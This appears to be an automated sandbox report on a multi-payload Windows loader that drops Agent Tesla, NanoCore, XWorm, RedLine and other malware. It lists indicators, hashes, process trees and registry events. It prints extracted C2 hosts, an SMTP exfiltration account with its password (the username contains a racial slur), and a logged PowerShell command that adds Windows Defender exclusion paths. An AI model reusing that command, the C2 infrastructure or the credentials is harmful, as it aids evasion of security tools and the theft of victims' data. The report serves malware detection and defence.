Malware analysis 4363463463464363463463463.exe Malicious activity

Add for printing

File name:	4363463463464363463463463.exe
Full analysis:	https://app.any.run/tasks/44fb1274-4e92-4c93-9cf2-4efe84f0c5a8
Verdict:	Malicious activity
Threats:	Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. Agent Tesla ist eine Spyware, die Informationen über die Aktionen ihrer Opfer sammelt, indem sie Tastatureingaben und Benutzerinteraktionen aufzeichnet. Sie wird auf der speziellen Website, auf der diese Malware verkauft wird, fälschlicherweise als legitime Software vermarktet. DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. Phorpiex is a malicious software that has been a significant threat in the cybersecurity landscape since 2016. It is a modular malware known for its ability to maintain an extensive botnet. Unlike other botnets, Phorpiex does not concentrate on DDoS attacks. Instead, it has been involved in numerous large-scale spam email campaigns and the distribution of other malicious payloads, such as LockBit. RedLine Stealer is a malicious program that collects users’ confidential data from browsers, systems, and installed software. It also infects operating systems with other malware. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. XWorm ist ein Remote Access Trojaner (RAT), der als Malware-as-a-Service verkauft wird. Er verfügt über ein umfangreiches Hacking-Toolset und ist in der Lage, private Informationen und Dateien auf dem infizierten Computer zu sammeln, MetaMask- und Telegram-Konten zu kapern und Benutzeraktivitäten zu verfolgen. XWorm wird in der Regel durch mehrstufige Angriffe auf die Computer der Opfer übertragen, die mit Phishing-E-Mails beginnen. Malware Trends Tracker >>>
Analysis date:	August 22, 2024, 21:27:38
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	loader opendir hausbomber phorpiex dcrat smb autoit github smtp redline stealer crypto-regex xworm evasion smokeloader nanocore agenttesla
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5:	2A94F3960C58C6E70826495F76D00B85
SHA1:	E2A1A5641295F5EBF01A37AC1C170AC0814BB71A
SHA256:	2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE
SSDEEP:	192:2we8sGKE6MqyG7c20L7BIW12n/ePSmzkTInu8stYcFwVc03KY:9e8sGKfMqyGg20PKn/cRaInuptYcFwVY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- DCRAT has been detected (YARA)
  - 4363463463464363463463463.exe (PID: 6732)
- HAUSBOMBER has been detected (YARA)
  - 4363463463464363463463463.exe (PID: 6732)
- Changes the autorun value in the registry
  - r.exe (PID: 6468)
  - Survox.exe (PID: 1076)
  - tt.exe (PID: 6692)
  - 1804925973.exe (PID: 6488)
  - t.exe (PID: 6264)
  - 2978130666.exe (PID: 6600)
- Attempt to connect to SMB server
  - System (PID: 4)
- Creates or modifies Windows services
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- Changes the Windows auto-update feature
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- Changes Security Center notification settings
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- Changes appearance of the Explorer extensions
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- PHORPIEX has been detected (SURICATA)
  - svchost.exe (PID: 2256)
  - sysmablsvr.exe (PID: 5880)
  - sysmysldrv.exe (PID: 6440)
  - 4363463463464363463463463.exe (PID: 6732)
  - sysarddrvs.exe (PID: 6416)
- Adds path to the Windows Defender exclusion list
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
  - cmd.exe (PID: 7556)
  - cmd.exe (PID: 1048)
- Actions looks like stealing of personal data
  - RegSvcs.exe (PID: 6880)
  - MSBuild.exe (PID: 7956)
- Steals credentials from Web Browsers
  - RegSvcs.exe (PID: 6880)
  - MSBuild.exe (PID: 7956)
- Scans artifacts that could help determine the target
  - RegSvcs.exe (PID: 6880)
- Connects to the CnC server
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- Application was injected by another process
  - explorer.exe (PID: 4552)
- Runs injected code in another process
  - 1.exe (PID: 6708)
- SMOKE has been detected (SURICATA)
  - explorer.exe (PID: 4552)
- NANOCORE has been detected (YARA)
  - Survox.exe (PID: 1076)
- XWORM has been detected (YARA)
  - freedom.exe (PID: 6564)
- PHORPIEX has been detected (YARA)
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- AGENTTESLA has been detected (YARA)
  - RegSvcs.exe (PID: 6880)
- REDLINE has been detected (YARA)
  - anticheat.exe (PID: 6932)
SUSPICIOUS
- Drops the executable file immediately after the start
  - 4363463463464363463463463.exe (PID: 6732)
  - pei.exe (PID: 6476)
  - r.exe (PID: 6468)
  - npp.exe (PID: 6720)
  - Survox.exe (PID: 1076)
  - tt.exe (PID: 6692)
  - 1804925973.exe (PID: 6488)
  - 2978130666.exe (PID: 6600)
  - t.exe (PID: 6264)
  - Destover.exe (PID: 7944)
  - MSBuild.exe (PID: 7956)
- Executable content was dropped or overwritten
  - 4363463463464363463463463.exe (PID: 6732)
  - pei.exe (PID: 6476)
  - r.exe (PID: 6468)
  - npp.exe (PID: 6720)
  - Survox.exe (PID: 1076)
  - tt.exe (PID: 6692)
  - 1804925973.exe (PID: 6488)
  - t.exe (PID: 6264)
  - Destover.exe (PID: 7944)
  - 2978130666.exe (PID: 6600)
  - MSBuild.exe (PID: 7956)
  - explorer.exe (PID: 4552)
- Reads the date of Windows installation
  - 4363463463464363463463463.exe (PID: 6732)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
  - MSBuild.exe (PID: 7956)
- Reads security settings of Internet Explorer
  - 4363463463464363463463463.exe (PID: 6732)
  - pei.exe (PID: 6476)
  - npp.exe (PID: 6720)
  - DownSysSoft.exe (PID: 6352)
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
  - MSBuild.exe (PID: 7956)
- Adds/modifies Windows certificates
  - anticheat.exe (PID: 6932)
- Connects to unusual port
  - 4363463463464363463463463.exe (PID: 6732)
  - anticheat.exe (PID: 6932)
  - Survox.exe (PID: 1076)
  - DownSysSoft.exe (PID: 6352)
  - aaa.exe (PID: 6764)
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- The process creates files with name similar to system file names
  - 4363463463464363463463463.exe (PID: 6732)
  - Survox.exe (PID: 1076)
- Starts itself from another location
  - r.exe (PID: 6468)
  - tt.exe (PID: 6692)
  - 1804925973.exe (PID: 6488)
  - t.exe (PID: 6264)
  - 2978130666.exe (PID: 6600)
- Potential Corporate Privacy Violation
  - 4363463463464363463463463.exe (PID: 6732)
  - System (PID: 4)
  - pei.exe (PID: 6476)
  - DownSysSoft.exe (PID: 6352)
- Starts CMD.EXE for commands execution
  - dmshell.exe (PID: 6432)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
  - MSBuild.exe (PID: 7956)
- Creates or modifies Windows services
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- Executes application which crashes
  - ngown.exe (PID: 4816)
  - freedom.exe (PID: 6564)
- Script adds exclusion path to Windows Defender
  - cmd.exe (PID: 1048)
  - cmd.exe (PID: 7556)
- Starts POWERSHELL.EXE for commands execution
  - cmd.exe (PID: 1048)
  - cmd.exe (PID: 7556)
- Process drops legitimate windows executable
  - 4363463463464363463463463.exe (PID: 6732)
  - Destover.exe (PID: 7944)
  - MSBuild.exe (PID: 7956)
- Starts a Microsoft application from unusual location
  - Destover.exe (PID: 7944)
- Checks Windows Trust Settings
  - MSBuild.exe (PID: 7956)
- Connects to the server without a host name
  - 4363463463464363463463463.exe (PID: 6732)
  - sysmablsvr.exe (PID: 5880)
- Process requests binary or script from the Internet
  - 4363463463464363463463463.exe (PID: 6732)
- Searches for installed software
  - MSBuild.exe (PID: 7956)
- The process drops C-runtime libraries
  - MSBuild.exe (PID: 7956)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 7596)
- Found regular expressions for crypto-addresses (YARA)
  - freedom.exe (PID: 6564)
- Checks for external IP
  - svchost.exe (PID: 2256)
  - freedom.exe (PID: 6564)
- Connects to SMTP port
  - RegSvcs.exe (PID: 6880)
- The process executes via Task Scheduler
  - bjcgshj (PID: 7580)
- The process drops Mozilla's DLL files
  - MSBuild.exe (PID: 7956)
INFO
- Reads security settings of Internet Explorer
  - explorer.exe (PID: 4552)
- Reads Environment values
  - 4363463463464363463463463.exe (PID: 6732)
  - Survox.exe (PID: 1076)
  - RegSvcs.exe (PID: 6880)
  - MSBuild.exe (PID: 7956)
  - freedom.exe (PID: 6564)
- Checks supported languages
  - 4363463463464363463463463.exe (PID: 6732)
  - Downdd.exe (PID: 6376)
  - pei.exe (PID: 6476)
  - r.exe (PID: 6468)
  - tt.exe (PID: 6692)
  - freedom.exe (PID: 6564)
  - aaa.exe (PID: 6764)
  - npp.exe (PID: 6720)
  - tdrpload.exe (PID: 6252)
  - anticheat.exe (PID: 6932)
  - a.exe (PID: 460)
  - Survox.exe (PID: 1076)
  - DownSysSoft.exe (PID: 6352)
  - sysmablsvr.exe (PID: 5880)
  - 1804925973.exe (PID: 6488)
  - t.exe (PID: 6264)
  - sysmysldrv.exe (PID: 6676)
  - 1.exe (PID: 6708)
  - sysmysldrv.exe (PID: 6440)
  - ngown.exe (PID: 4816)
  - sysarddrvs.exe (PID: 6416)
  - sysmablsvr.exe (PID: 6000)
  - s.exe (PID: 3292)
  - RegSvcs.exe (PID: 6880)
  - 2978130666.exe (PID: 6600)
  - 66b7a2aef1283_doz.exe (PID: 7856)
  - Destover.exe (PID: 7944)
  - MSBuild.exe (PID: 7956)
  - twztl.exe (PID: 8080)
  - bjcgshj (PID: 7580)
- Reads the computer name
  - 4363463463464363463463463.exe (PID: 6732)
  - freedom.exe (PID: 6564)
  - anticheat.exe (PID: 6932)
  - pei.exe (PID: 6476)
  - aaa.exe (PID: 6764)
  - npp.exe (PID: 6720)
  - Survox.exe (PID: 1076)
  - DownSysSoft.exe (PID: 6352)
  - RegSvcs.exe (PID: 6880)
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
  - 66b7a2aef1283_doz.exe (PID: 7856)
  - MSBuild.exe (PID: 7956)
- Checks proxy server information
  - 4363463463464363463463463.exe (PID: 6732)
  - pei.exe (PID: 6476)
  - DownSysSoft.exe (PID: 6352)
  - npp.exe (PID: 6720)
  - sysmablsvr.exe (PID: 5880)
  - WerFault.exe (PID: 3384)
  - MSBuild.exe (PID: 7956)
  - sysmysldrv.exe (PID: 6440)
  - sysarddrvs.exe (PID: 6416)
  - explorer.exe (PID: 4552)
  - freedom.exe (PID: 6564)
  - WerFault.exe (PID: 3540)
- Reads the software policy settings
  - 4363463463464363463463463.exe (PID: 6732)
  - WerFault.exe (PID: 3384)
  - MSBuild.exe (PID: 7956)
  - RegSvcs.exe (PID: 6880)
  - WerFault.exe (PID: 3540)
- Reads the machine GUID from the registry
  - anticheat.exe (PID: 6932)
  - 4363463463464363463463463.exe (PID: 6732)
  - freedom.exe (PID: 6564)
  - Survox.exe (PID: 1076)
  - RegSvcs.exe (PID: 6880)
  - 66b7a2aef1283_doz.exe (PID: 7856)
  - MSBuild.exe (PID: 7956)
  - sysmablsvr.exe (PID: 5880)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
- Disables trace logs
  - 4363463463464363463463463.exe (PID: 6732)
  - freedom.exe (PID: 6564)
- Process checks computer location settings
  - 4363463463464363463463463.exe (PID: 6732)
  - sysarddrvs.exe (PID: 6416)
  - sysmysldrv.exe (PID: 6440)
  - MSBuild.exe (PID: 7956)
- Creates files or folders in the user directory
  - anticheat.exe (PID: 6932)
  - explorer.exe (PID: 4552)
  - pei.exe (PID: 6476)
  - Survox.exe (PID: 1076)
  - DownSysSoft.exe (PID: 6352)
  - WerFault.exe (PID: 3384)
  - MSBuild.exe (PID: 7956)
  - WerFault.exe (PID: 3540)
- Reads mouse settings
  - Downdd.exe (PID: 6376)
  - DownSysSoft.exe (PID: 6352)
  - ngown.exe (PID: 4816)
- Create files in a temporary directory
  - npp.exe (PID: 6720)
  - pei.exe (PID: 6476)
  - DownSysSoft.exe (PID: 6352)
  - ngown.exe (PID: 4816)
- Process checks whether UAC notifications are on
  - Survox.exe (PID: 1076)
- Creates files in the program directory
  - Survox.exe (PID: 1076)
  - MSBuild.exe (PID: 7956)
- Reads Microsoft Office registry keys
  - RegSvcs.exe (PID: 6880)
- Checks if a key exists in the options dictionary (POWERSHELL)
  - powershell.exe (PID: 7248)
  - powershell.exe (PID: 7640)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 7248)
  - powershell.exe (PID: 7640)
- Reads product name
  - MSBuild.exe (PID: 7956)
- Reads CPU info
  - MSBuild.exe (PID: 7956)
- Attempt to transmit an email message via SMTP
  - RegSvcs.exe (PID: 6880)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

RedLine

(PID) Process(6932) anticheat.exe

C2 (1)38.180.203.208:14238

Options

ErrorMessage

Version1

XWorm

(PID) Process(6564) freedom.exe

C2exonic-hacks.com:1920

Keys

AES<123456789>

Options

Splitter<Xwormmm>

Sleep timeNewAged

USB drop nameUSB.exe

MutexQGOn8xsapkNWVjl5

Nanocore

(PID) Process(1076) Survox.exe

KeyboardLoggingTrue

BuildTime2024-08-16 18:00:35.335880

Version1.2.2.0

Mutexd9a2690c-d972-4399-8b23-c0fc8e2ac7c3

DefaultGroupDefault

PrimaryConnectionHostvowquybcw.org

BackupConnectionHost127.0.0.1

ConnectionPort34587

RunOnStartupTrue

RequestElevationFalse

BypassUserAccountControlFalse

ClearZoneIdentifierTrue

ClearAccessControlTrue

SetCriticalProcessFalse

PreventSystemSleepTrue

ActivateAwayModeTrue

EnableDebugModeFalse

RunDelay0

ConnectDelay3985

RestartDelay5000

TimeoutInterval5000

KeepAliveTimeout30000

MutexTimeout5000

LanTimeout2500

WanTimeout8000

BufferSize65535

MaxPacketSize10485760

GCThreshold10485760

UseCustomDnsServerTrue

PrimaryDnsServer8.8.8.8

BackupDnsServer8.8.4.4

AgentTesla

(PID) Process(6880) RegSvcs.exe

Protocolsmtp

Hostmail.worlorderbillions.top

Port587

Usernameniggabown22jan2024@worlorderbillions.top

Password3^?r?mtxk(kt

No Malware configuration.

Add for printing

TRiD

.exe	\|	Generic CIL Executable (.NET, Mono, etc.) (82.9)
.dll	\|	Win32 Dynamic Link Library (generic) (7.4)
.exe	\|	Win32 Executable (generic) (5.1)
.exe	\|	Generic Win/DOS Executable (2.2)
.exe	\|	DOS Executable Generic (2.2)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2023:12:22 08:29:10+00:00
ImageFileCharacteristics:	Executable, Large address aware
PEType:	PE32
LinkerVersion:	80
CodeSize:	5632
InitializedDataSize:	4608
UninitializedDataSize:	-
EntryPoint:	0x3552
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows command line
FileVersionNumber:	0.0.0.0
ProductVersionNumber:	0.0.0.0
FileFlagsMask:	0x003f
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	Neutral
CharacterSet:	Unicode
FileDescription:
FileVersion:	0.0.0.0
InternalName:	4363463463464363463463463.exe
LegalCopyright:
OriginalFileName:	4363463463464363463463463.exe
ProductVersion:	0.0.0.0
AssemblyVersion:	0.0.0.0

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

200

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

System

[System Process]

User:

SYSTEM

Integrity Level:

SYSTEM

460

"C:\Users\admin\Desktop\Files\a.exe"

C:\Users\admin\Desktop\Files\a.exe

—

4363463463464363463463463.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\desktop\files\a.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ws2_32.dll

1048

"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"

C:\Windows\SysWOW64\cmd.exe

—

sysarddrvs.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

1076

"C:\Users\admin\Desktop\Files\Survox.exe"

C:\Users\admin\Desktop\Files\Survox.exe

4363463463464363463463463.exe

User:

admin

Integrity Level:

HIGH

Modules

Images
c:\users\admin\desktop\files\survox.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll

Nanocore

(PID) Process(1076) Survox.exe

KeyboardLoggingTrue

BuildTime2024-08-16 18:00:35.335880

Version1.2.2.0

Mutexd9a2690c-d972-4399-8b23-c0fc8e2ac7c3

DefaultGroupDefault

PrimaryConnectionHostvowquybcw.org

BackupConnectionHost127.0.0.1

ConnectionPort34587

RunOnStartupTrue

RequestElevationFalse

BypassUserAccountControlFalse

ClearZoneIdentifierTrue

ClearAccessControlTrue

SetCriticalProcessFalse

PreventSystemSleepTrue

ActivateAwayModeTrue

EnableDebugModeFalse

RunDelay0

ConnectDelay3985

RestartDelay5000

TimeoutInterval5000

KeepAliveTimeout30000

MutexTimeout5000

LanTimeout2500

WanTimeout8000

BufferSize65535

MaxPacketSize10485760

GCThreshold10485760

UseCustomDnsServerTrue

PrimaryDnsServer8.8.8.8

BackupDnsServer8.8.4.4

2256

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

3292

"C:\Users\admin\Desktop\Files\s.exe"

C:\Users\admin\Desktop\Files\s.exe

—

4363463463464363463463463.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\desktop\files\s.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ws2_32.dll

3384

C:\WINDOWS\SysWOW64\WerFault.exe -u -p 4816 -s 768

C:\Windows\SysWOW64\WerFault.exe

ngown.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Problem Reporting

Exit code:

Version:

10.0.19041.3996 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

3540

C:\WINDOWS\system32\WerFault.exe -u -p 6564 -s 1788

C:\Windows\System32\WerFault.exe

freedom.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Problem Reporting

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll

4552

C:\WINDOWS\Explorer.EXE

C:\Windows\explorer.exe

—

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Version:

10.0.19041.3758 (WinBuild.160101.0800)

Modules

Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\aepic.dll
c:\windows\system32\oleaut32.dll

4816

"C:\Users\admin\Desktop\Files\ngown.exe"

C:\Users\admin\Desktop\Files\ngown.exe

4363463463464363463463463.exe

User:

admin

Integrity Level:

HIGH

Exit code:

3221225477

Modules

Images
c:\users\admin\desktop\files\ngown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll

Add for printing

Total events

76 516

Read events

76 242

Write events

263

Delete events

Modification events


(PID) Process:	(4552) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:	write	Name:	IconLayouts
Value: 00000000000000000000000000000000030001000100010016000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000000D0000000000000053006B007900700065002E006C006E006B003E0020007C000000170000000000000061006E0069006D0061006C0073006D0065007300730061006700650073002E007200740066003E00200020000000160000000000000061007000700072006F007000720069006100740065006200650064002E006A00700067003E002000200000001700000000000000620065006C006900650076006500730065006100720063006800650073002E007200740066003E00200020000000170000000000000063006C0061007300730069006300730065007400740069006E00670073002E006A00700067003E002000200000001600000000000000640069006300740069006F006E006100720079006A0075006E0065002E0070006E0067003E002000200000001B0000000000000069006E0074006500720065007300740069006E006700700072006F006700720061006D0073002E0070006E0067003E0020002000000011000000000000006D00720065007800700072006500730073002E007200740066003E0020002000000016000000000000006E00650063006500730073006100720079006D0069006C00650073002E0070006E0067003E002000200000001300000000000000720065006E00740061006C00650061007200740068002E007200740066003E002000200000001800000000000000730068006F007000700069006E0067007300740061007200740069006E0067002E0070006E0067003E002000200000001400000000000000730075006900740065006D006F006E00740068006C0079002E007200740066003E00200020000000100000000000000074006F007900730064006100790073002E006A00700067003E0020002000000015000000